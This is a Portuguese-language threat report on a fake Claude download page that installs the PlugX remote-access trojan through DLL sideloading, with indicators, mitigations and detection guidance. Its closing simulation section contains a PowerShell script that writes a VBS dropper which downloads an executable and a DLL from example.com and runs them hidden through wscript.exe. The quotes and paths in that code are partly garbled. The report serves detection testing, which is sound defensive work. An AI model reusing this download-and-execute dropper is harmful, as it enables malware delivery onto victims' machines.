Site falso do Claude instala malware que dá aos atacantes acesso ao seu computador

Resumo

Os atacantes configuraram uma página falsa de download do Claude que entregou um arquivo ZIP trojanizado para usuários desavisados. Uma vez aberto, o arquivo instalou um cliente desktop Claude aparentemente legítimo enquanto implantava secretamente o trojan de acesso remoto PlugX por meio de carregamento de DLL com um atualizador G DATA assinado. A carga maliciosa foi colocada na pasta Inicializar do usuário para manter a persistência e, em seguida, iniciou comunicação HTTPS de saída com um servidor de comando e controle. A campanha mostra como os atores de ameaças estão cada vez mais explorando o interesse em ferramentas de IA populares como uma isca de engenharia social para comprometimento inicial.

Investigação

Durante a análise, os pesquisadores descompactaram o arquivo ZIP, identificaram o caminho de instalação do MSI e seguiram a execução para um VBScript dropper que gravou NOVUpdate.exe, um avk.dll, e um arquivo de dados criptografado na pasta de Inicialização. A execução na sandbox confirmou que o binário sideloaded foi iniciado com sucesso, alterou uma chave de registro relacionada ao TCP/IP e iniciou conexões de saída pela porta 443 para um endereço IP hospedado na Alibaba Cloud. Esses achados confirmaram a entrega do PlugX por meio de uma cadeia de infecção em etapas disfarçada como software legítimo de IA.

Mitigação

Os usuários devem baixar o software Claude apenas de fontes oficiais verificadas e validar a autenticidade dos pacotes de instalação antes da execução. Os defensores devem inspecionar as pastas de Inicialização em busca de binários ou DLLs inesperados, especialmente arquivos que imitam componentes de atualização legítimos. A telemetria de firewall e endpoint também deve ser revisada quanto a tráfego HTTPS de saída suspeito vinculado a novos aplicativos instalados. Remover os arquivos maliciosos, reverter quaisquer alterações de registro não autorizadas e executar uma varredura de antivírus confiável são etapas-chave para conter a ameaça.

Resposta

As equipes de segurança devem detectar e alertar sobre a presença de NOVUpdate.exe, avk.dll, ou NOVUpdate.exe.dat dentro do diretório de Inicialização. Detecções adicionais devem se concentrar em binários assinados do atualizador G DATA carregando DLLs não confiáveis e estabelecendo sessões TLS de saída inesperadas para a infraestrutura identificada. Hosts afetados devem passar por remediação completa e uma revisão forense para confirmar que nenhum outro componente do PlugX, mecanismo de persistência ou cargas adicionais permanecem ativos.

Execução de Simulação

Pré-requisito: A Verificação de Pré-voo de Telemetria e Linha de Base deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) destinada a acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.

• Narrativa de Ataque & Comandos:
  Um atacante cria um script VBS malicioso que baixa a carga útil NOVUpdate.exe de um servidor de comando e controle (C2), escreve para %TEMP%, e então o executa via wscript.exe. O mesmo script também carrega avk.dll do mesmo local para realizar o carregamento de DLL. O atacante depende do Windows Script Host (WSH) embutido para evitar levantar suspeitas de heurísticas tradicionais de antivírus.

  1. Escrever o arquivo VBS malicioso (malicious.vbs) para %TEMP%.
  2. Invocar wscript.exe com o caminho do arquivo VBS.
  3. O script VBS realiza um HTTP GET para buscar NOVUpdate.exe and avk.dll, grava-os no disco e executa NOVUpdate.exe.

• Script de Teste de Regressão:

  # --------------------------------------------------------------------
  # Simulação de dropper malicioso – aciona a regra Sigma
  # --------------------------------------------------------------------
  $tempDir = "$env:TEMPDropperDemo"
  New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
  
  # 1. Criar VBS malicioso que baixa dois arquivos e executa NOVUpdate.exe
  $vbsPath = "$tempDirmalicious.vbs"
  $vbsContent = @"
  Set objXML = CreateObject("Microsoft.XMLHTTP")
  objXML.open "GET", "http://example.com/NOVUpdate.exe", False
  objXML.send
  If objXML.Status = 200 Then
  Set objStream = CreateObject("ADODB.Stream")
  objStream.Type = 1
  objStream.Open
  objStream.Write objXML.ResponseBody
  objStream.SaveToFile "$tempDirNOVUpdate.exe", 2
  objStream.Close
  End If

‘ Download avk.dll (usado para carregamento de DLL) objXML.open “GET”, “http://example.com/avk.dll“, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(“ADODB.Stream”) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile “$tempDiravk.dll”, 2 objStream.Close End If

‘ Executa o EXE baixado CreateObject(“WScript.Shell”).Run “””$tempDirNOVUpdate.exe”””, 0, False “@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Executar o script via wscript.exe (esta é a telemetria que estamos testando)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPCIONAL: pause para permitir que a detecção seja disparada
Start-Sleep -Seconds 10
# ---------------------------------------------------------------------

• Comandos de Limpeza:

  # Remover todos os artefatos criados pela simulação
  $tempDir = "$env:TEMPDropperDemo"
  if (Test-Path $tempDir) {
      Remove-Item -Path $tempDir -Recurse -Force
  }
  
  # Assegure-se de que quaisquer processos NOVUpdate.exe persistentes estejam encerrados
  Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force